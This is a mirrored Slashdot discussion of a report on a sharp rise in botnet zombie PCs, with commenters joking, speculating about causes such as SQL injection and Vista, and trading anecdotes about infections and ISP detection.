Slashdot Mirror
Zombie Network Explosion
anti-globalism writes "The number of compromised zombie PCs in botnet networks has quadrupled over the last three months. Shadowserver tracks botnet activity and the number of command and control servers. It uses a variety of metrics to slice and dice its figures based in part on the entropy of botnet infections. The clear trend within these figures is upwards, with a rise in botnet numbers of 100,000 to 400,000 (if 30 day entropy is factored into equations) or from 20,000 to 60,000 (for five day entropy)."
Comment removed based on user account deletion
Interesting. Far more interesting to me, however, is speculating on how botnets quadrupled in the part three months.
Honest question - without resorting to answers like "if it's not running Linux it's zombied" I'd be curious to know how the average user can even determine whether their box is pwn3d.
If libertarians are so opposed to effective government, why don't they all move to Somalia?
students have to much free time in the summer holidays..
can only mean one of two things:
the machines are starting to take over
people arent getting any more intelligent with pc's than they are savvy. job security!
Good people go to bed earlier.
Comment removed based on user account deletion
because it could mean that people who are vulnerable to these types of attacks are on the rise. You would have thought that after all this time and the numerous virus-by-email crises, people would have learned better.
while(1) attack(People.Sandy);
Zombie Network Explosion? Wasn't that a Flash game on some site?
This guy's the limit!
What is the latest Uwe Boll movie, Alex?
Vista's Security Rendered Completely Useless leading more machines (with Vista) open to drive by downloads, etc, becoming zombies?
Hell yeah! I've seen this movie! It rocks!
Wait...what?
They've become self-aware. Run for the hills!
throw new NoSignatureException();
But it was bots all the way down...
Exactly. That's why all of you need to be working on your zombie plan.
Now if anyone needs me, I'll be in the attic...
I'm actually surprised that we don't see any vigilante developers actually developing something that in some way or another disable or display information about the serious state the infected machine is in.
Of course, I see the problems with doing so (hasn't there been an article about this topic earlier?), but still, there are a lot of infected machines that have been so for ages are not likely to vanish. Bandwidth and cpu cycles can definitely be spent on better things than spam.
must be related to the decrease in sunspots in recent weeks
I noticed an incredible increase in DenyHosts alerts over the last three days to the extent that I had to turn off alert emails. This picture says it all: http://stats.denyhosts.net/stats.html
What else!
Genesis 1:32 And God typed
So if researchers can detect these things with apparent reliability in their process, why can't ISPs detect them the same way and cut the bastards off?
If Comcast and ilk such as that were really interested in conserving network bandwidth, they'd be cutting off zombies instead of putting on bandwidth caps.
I want a new quote. One that won't spill. One that don't cost too much. Or come in a pill.
I wonder how many Zombies exist in the face of fully updated Anti-virus /security software from a major Vendor?, anyone out ther been 'Zombied' in the face of brand name fully updated and current anti-virus software and definitions , If so?
what brand(s) ?
Internet of the Dead
Because plenty of windows core services still send traffic even if there's not an obvious "app" in charge of them (there are a bunch of normal system processes that tend to run services underneath them, some of which involve networking).
And that doesn't count traffic on your network as well. Even if your computer isn't sending anything out, it may be responding to other traffic on the network depending on how things are configured, even if it's just to say "this is not the machine you're looking for."
I don't doubt it at all. My computer, which is usually the epitome of clean, caught a worm the other day. It was automatically downloaded and executed (no clicks or dialogs) from one of the top 10 mainstream news websites, no less. Most likely one of the injection attacks. Had to really dig into it to find out that it somehow got downloaded by prefetch in Firefox (which has been promptly disabled now).
The ironic part... with all of the precautions I take, it wasn't detected at the router level nor the virus scan level. Windows firewall caught it before it could download its payload. As I manually removed it and restored from yesterday's registry copy, I had to chuckle a little.
But now that I've seen first-hand an unrequested .exe not only downloaded into ./system32 but executed - both without user approval or so much as a dialog box - I can only imagine how many zombies have popped up in the last few weeks.
We all knew the day would come when Zombies destroyed everything we live for.
Come on, all the machines linking up just in time for the season premiere of the Sarah Connor Chronicles? Fox = marketing genius?
* Making waffles just so I have something to Twitter *
If you block the entrance to a shopping mall you get arrested, but if you take over a tenth of all computers on the entire planet nobody cares?
Hunt the criminals down, fast and hard. Find them and execute them on the spot. Do this everytime a virus breaks out. Everytime.
They will get the message. Yes they will.
correct headline ..
davecb5620@gmail.com
But it was bots all the way down...
The only thing I found was Kevin Bacon...
...why can't ISPs detect them the same way and cut the bastards off?
They can, and sometimes do.
One time a friend of a friend brought her PC over for me to look at. She said it wasn't working well, and wanted me to fix it. I plugged it into my internet connection just to check a few things, and then went about reformatting it. Later, when I plugged my machine into the net and tried to access the web, I got a default ISP web page telling me to call network security. It turns out that her machine had sent out insane amounts of SMTP packets, and my connection was automatically shut-off to prevent more. Since I knew what we were talking about, unlike most customers I suppose, they restored my connection right away rather than keeping a 24 hour shutdown.
Obviously her ISP didn't do this, but mine sure does.
Does it make you happy you're so strange?
"So if researchers can detect these things with apparent reliability in their process, why can't ISPs detect them the same way and cut the bastards off?"
...
If they did, they risk cutting off their own spamVertisers, there's no money in protecting their own customers, it would break stuff, they can't be bothered
davecb5620@gmail.com
that's funny, ne? that's what people deserve for running and supporting windows
Only thing I found was Kevin Bacon...
THere is only one possible explanation; Vista is making inroads, and the botmasters have new openings on it. No other system is growing that fast (vista is being forced onto new systems by MS). And if it was an old base of some system (say XP), then it would grow MUCH MUCH faster.
I prefer the "u" in honour as it seems to be missing these days.
Sorry for being a uninformed moron, but what exactly is the definition of the "entropy of botnet infections"? Their infection rate? Their "healing" rate?
By will alone I set my mind in motion. - Mentat prayer
Back in 2002-4, I worked for a company that developed specialized packet sniffers, that processed anywhere from 1mb (sold to small companies) to 100 mb drops (sold to ISPs) and a specialized box with much higher for sale to several gov. agencies. A simple PC with tcpdump, dsniff or Ethereal combined with a little bit of processing behind the scene can easily process 100 MB drops.
I prefer the "u" in honour as it seems to be missing these days.
I'm wondering if I can get Zombie network on Cablevision and if it would be in HD.
If things continue to get worse the year of the Linux desktop will come sooner than you'd expect. I know people who won't do a thing on their computer without worrying about viruses. I think at some point when the concerns and the solutions will have reached a certain point Windows will have irremediably lost its OS monopoly and it won't matter what OS you run anymore.
Not like it matters much anymore for most people anyways, most of what they do involves just a web browser.
You just got troll'd!
Best band name ever!!
I've now seen more than a few examples of linking to a "YouTube Video" where the site looks exactly like YouTube, but the video window contains an Active X control, and the URL is definitely not youtube.com. I only noticed because we're on Macs here and Firefox asked me if I wanted to download the plugin to view the content.
It's all because of Microsoft's new software release, WindowsXP Anti-Virus 2008. Everybody's getting it, microsoft sends them an email telling them to click a link to get the new download. The damn thing won't run on my linux box though, i feel left out... sigh.
Oh, clients, why must you want the silly shit you want?
A computer once beat me at chess, but it was no match for me at kick boxing. Emo Philips
This must be the most awesome headline ever
Boom! Out go the lights! You're screwed, in a bad way.
I KNEW Microsoft was up to some new antivirus program. The logic is elegant, and brilliant:
- Design a new OS, oh, call it a browser if you want
- Make it a real heavyweight, more RAM used than the host, threads everywhere, screen candy layered over screen candy, shortcuts, you name it, all to consume cycles and starve the bot software (and the viruses, etc.)
- Botnets wither from lack of nutrition. Herders go broke. In fact, no one gets anything else done on their puters any more. No more harm! NO MORE HARM!
- Profit!
Wait... Wasn't Google? Or did Mozilla just release something? Wait, Opera is always coming up with somethi... Couldn't be AOL could it?... Suppose CERN finally... no, can't be, it's not really running yet, oh, those crazy kids at Apple, wait, the Oracle guys finally... nope, maybe somebody finally fixed... no, that's not it... wait.. Gibson? Nawww....
deleting the extra space after periods so i can stay relevant, yeah.
http://dummcomics.com/index?sid=31
I've had the displeasure of working on plenty of infected systems in my time, and it's fairly easy to disable services that need the network on XP and 2000 systems, and still have a machine you can work with.
Traffic on the network? I would think while troubleshooting a system that you suspect may be infected with something, you would want to isolate the system as much as possible! Putting it in your DMZ instead of on the same network segment as the rest of your network would be a good start. Nothing should be trying to talk to it, intended or not.
I used to maintain a handful of black boxes that easily handled multiple T3 connections to the internet, and did real-time packet inspection.
It's amazing what specialized hardware can do, and even more amazing what a decent PC properly configured can handle.
The botnets are doing better than the elephants!
They'll get the message, for sure. Rather than being obnoxious spammers operating out of a basement, they'll be obnoxious spammers operating out of a basement with lots and lots of guns.
So long as the incentive is there, you're going to have people incentivized by it. You can stack on as many penalties or consequences as you want, you'll still get a few people for whom it won't matter.
There are really only two options; remove the incentive. In this case, I have no idea how that works. Alternatively, work to minimize actual damage. Ironically, I think that spammers are likely to feed into anti-net-neutrality movements. When Comcast is filtering all your traffic, they can filter out virus payloads. Everyone is happy in 1984!
[Ego]out
Speaking as someone that regularly works on number processing and real-time applications, I've given up on Windows machines. I just assume every Windows box is running ample code that is outside my control, and that code will make the machine much slower for any mathematically intensive computations, especially if they involve disk access or network access. All of the anti-virus code designed to stop viruses and bot-nets is killing Windows as a platform.
One way or another, you pay your speed and uptime penalty. You either pay in downtime caused by the "bad" guys writing bot-nets, malware or viruses, or you pay in slow speed caused by the "good" guys like Microsoft, Symantec, and McAfee, who are trying to stop the bot-nets, malware and viruses. The modern "good" vs. "bad" arms race is resulting in anti-virus software that is so slow that it is strangling the Windows platform with endless code bloat. If you want to prove this to yourself, get an older PC with a fresh Windows installation. Start installing software on it, one package at a time. As the newer service packs are applied, the anti-virus software installed, and the software packages installed, the PC will actually slow down!
Building better anti-virus software for Windows is self-defeating. It slows the computer down to the point that Windows is useless.
Run Linux. Take control of your own computer.
There's that new "antivirus XP" thing doing the rounds. I bet loads of people have been stupid enough to click on that.
No sig today...
Not sure if you're having the same experience that I am or not. I have a system at home that acts as a (FreeBSD) web server. Periodically I'll see single days where 300+ individual systems will attempt to get in via ssh. According to /var/log/messages, each system tries on average one user name and then gives up.
Of course quite a few of them are trying root (which any smart admin will disable for remote access), but nonetheless I see a lot of this.
My question for you though is whether or not it is even worthwhile to blacklist and lock out these systems. It seems like they only try once and give up - I suspect that locking all these out could end up just producing an obscenely long list of firewall rules that might not necessarily solve anything.
Feel free to let me know if you think I'm missing something, or if you are seeing something different in your traffic.
Damn_registrars has no butt-hole. Damn_registrars has no use for a butt-hole.
>If your machine's admin password is blank and you're not behind a NAT, you are completely exposed.
As of XP Service Pack 2, the built-in software firewall is on by default, and blank passwords disable network logins. Not that the security posture of the typical home machine is anything we'd consider decent, but it's not the same as running sshd with a blank root password would be.
I think that this rise in zombies is 100% attributed to the latest sql injection attacks that are going around. The attacks append links to an external javascript file to every field in a sql database in the hopes that it will be rendered on the website. When it is rendered then the javascript tries a bunch of exploits on different browsers and plugins to deliver its payload and create another bot. This attack turns insecure web servers into carriers for the exploit.
The amount of attacks using this has been going through the roof all summer.
...if your computer is part of a bot-net?
Glad you had so much to offer in this thread.
Read some more, I clarified my original post in a follow up, and I didn't forget about services, which can be disabled just like applications.
I guess I'll have to start posting 200 page technical docs for folks like you and the guy I originally posted to, since you apparently need the hand holding.
"if it's not running Linux it's zombied"
It isn't that easy. It might also be running BSD.
So now BSD is undead?
Er, wait a second...
If they can tell a pc if infected, I guess by the type of traffic it is spitting out, do they let the poor saps know it is infected? Hello your computer if infected click here to run a scan......
Even powered-down machines have network cards that "blink" regularly depending on the network you are plugged into.
There is plenty of self-sustaining network traffic that is generated across a switched network. Such as:
ARP Requests
Multicasts
DHCP Requests
Netbios Requests (yes - still exists)
Cisco CDP (as others)
Routing protocol HELO's
Are you plugged into a hub?
Any type of Proactive Corporate monitoring
Almost all manufacturers network cards are still active even when you are supposedly powered down the computer or server. This is a bad detection mechanism at best. At worst it is completely misleading.
are they PC's that have died but were able to reboot?
This title looks to me more like a bad movie than a story.
VLC FOR MAC IS DYING! IF YOU DEVELOP, PLEASE SAVE IT!!
What do I look for on my web server? What do I look for on a computer? Can a router or a Macintosh become a zombie?
"What would happen if all of these dabbling idiots were on linux instead of windows"
.. ?
The dabbling idiots shouldn't be allowed to use Linux until they learned to compile the kernel and what about all the dabbling Mac idiots
davecb5620@gmail.com
security, windows, brains. The three words that have the least in common.
"I bow to no man" - Riddick
Hey, I posted that first!
...but I haven't seen such a spike in spam (virus-laden or otherwise) at all.
But then again, I don't check my server logs that often any more. Maybe I should...
Remember what happened the last time the botnets went on a recruiting spree? (Hint: Georgia).
I wonder who they are prepping to DDOS this time? Georgia again? U.S. infrastructure? Which country is Russian invading next--or are they just going to finish the job they started in Georgia?
---dragoness